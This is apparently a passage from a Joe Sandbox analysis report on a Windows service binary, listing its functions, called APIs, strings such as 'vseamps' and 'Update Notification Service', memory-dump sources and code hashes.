                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                  • String ID:
                                  • API String ID: 2707001247-0
                                  • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                  • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                  • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                  • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                  Function 00007FFBC1BA4804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                  • Instruction ID: d4a1f2c31889616e877b7024582679f8314bc1f48c562e475dd94acb6948fe42
                                  • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                  • Instruction Fuzzy Hash: F0D19FB6B097428AEB209F75D4403AEB7A0FB45788F146135EE8D67B95DF38E491CB00
                                  Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                  • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                  • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                  • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                  Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                  • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                  • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                  • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                  Function 00007FFBC1BAB86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressFreeLibraryProc
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3013587201-537541572
                                  • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                  • Instruction ID: a062cb52ae0fa94b7fb43ae1d45aefe63a836313908353468bb8b1c45ff6a9cd
                                  • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                  • Instruction Fuzzy Hash: 654118A9B1AA0255EB16CF36DA205BB2391BF09B90F48A535DD1E67794DF3CE405CB00
                                  Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                  • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                  • API String ID: 1119674940-1966266597
                                  • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                  • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                  • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                  • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                  Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen$ComputerName
                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                  • API String ID: 3702919091-996641649
                                  • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                  • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                  • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                  • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                  Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                  • String ID:
                                  • API String ID: 3103264659-0
                                  • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                  • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                  • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                  • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                  Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$Info
                                  • String ID:
                                  • API String ID: 1775632426-0
                                  • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                  • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                  • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                  • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                  Function 00007FFBC1BA712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1BA72EB,?,?,?,00007FFBC1BA3EC0,?,?,?,?,00007FFBC1BA3CFD), ref: 00007FFBC1BA71B1
                                  • GetLastError.KERNEL32(?,?,?,00007FFBC1BA72EB,?,?,?,00007FFBC1BA3EC0,?,?,?,?,00007FFBC1BA3CFD), ref: 00007FFBC1BA71BF
                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1BA72EB,?,?,?,00007FFBC1BA3EC0,?,?,?,?,00007FFBC1BA3CFD), ref: 00007FFBC1BA71E9
                                  • FreeLibrary.KERNEL32(?,?,?,00007FFBC1BA72EB,?,?,?,00007FFBC1BA3EC0,?,?,?,?,00007FFBC1BA3CFD), ref: 00007FFBC1BA7257
                                  • GetProcAddress.KERNEL32(?,?,?,00007FFBC1BA72EB,?,?,?,00007FFBC1BA3EC0,?,?,?,?,00007FFBC1BA3CFD), ref: 00007FFBC1BA7263
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                  • Instruction ID: ffeb1a035198ed494dd794462f4705eaa4138285bbf04c8e24d7c32cf5df6209
                                  • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                  • Instruction Fuzzy Hash: 2031F4A9B1FB4191EF129F22E4105BA23D4BF49B60F595535ED1D27750EE3CE4458B00
                                  Function 00007FFBC1BA9444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value$ErrorLast
                                  • String ID:
                                  • API String ID: 2506987500-0
                                  • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                  • Instruction ID: fcc205c091ddb99f307a55c06a5f85bfa6e44c63f82ac463298a38d9a831066d
                                  • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                  • Instruction Fuzzy Hash: A9214FACF0E64245FB69AF31D6A113B53429F447B0F546734E93E67AC6EE2CB4419E00
                                  Function 00007FFBC1BB0100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                  • String ID: CONOUT$
                                  • API String ID: 3230265001-3130406586
                                  • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                  • Instruction ID: 6a55b551aabb88951b322a06efbeda7f2883df03e2b1b0ab500bdc8f3d0da3d8
                                  • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                  • Instruction Fuzzy Hash: 47119675B18A4182E7508F62E94432673A0FB88BE4F409234EA5DA7F94CF3CD544CB44
                                  Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                  • CreateEventW.KERNEL32 ref: 00000001400012C0
                                    • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                    • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                    • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                    • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                    • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                    • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                    • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                    • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                    • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                    • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                    • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                  • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                  • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                    • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                    • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                    • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                    • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                    • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                    • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                  • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                  • String ID: vseamps
                                  • API String ID: 3197017603-3944098904
                                  • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                  • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                  • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                  • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                  Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Messagesprintf_s
                                  • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                  • API String ID: 2642950106-3610746849
                                  • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                  • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                  • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                  • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                  Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                  • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                  • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                  • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                  Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                  • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                  • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                  • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                  Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                  • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
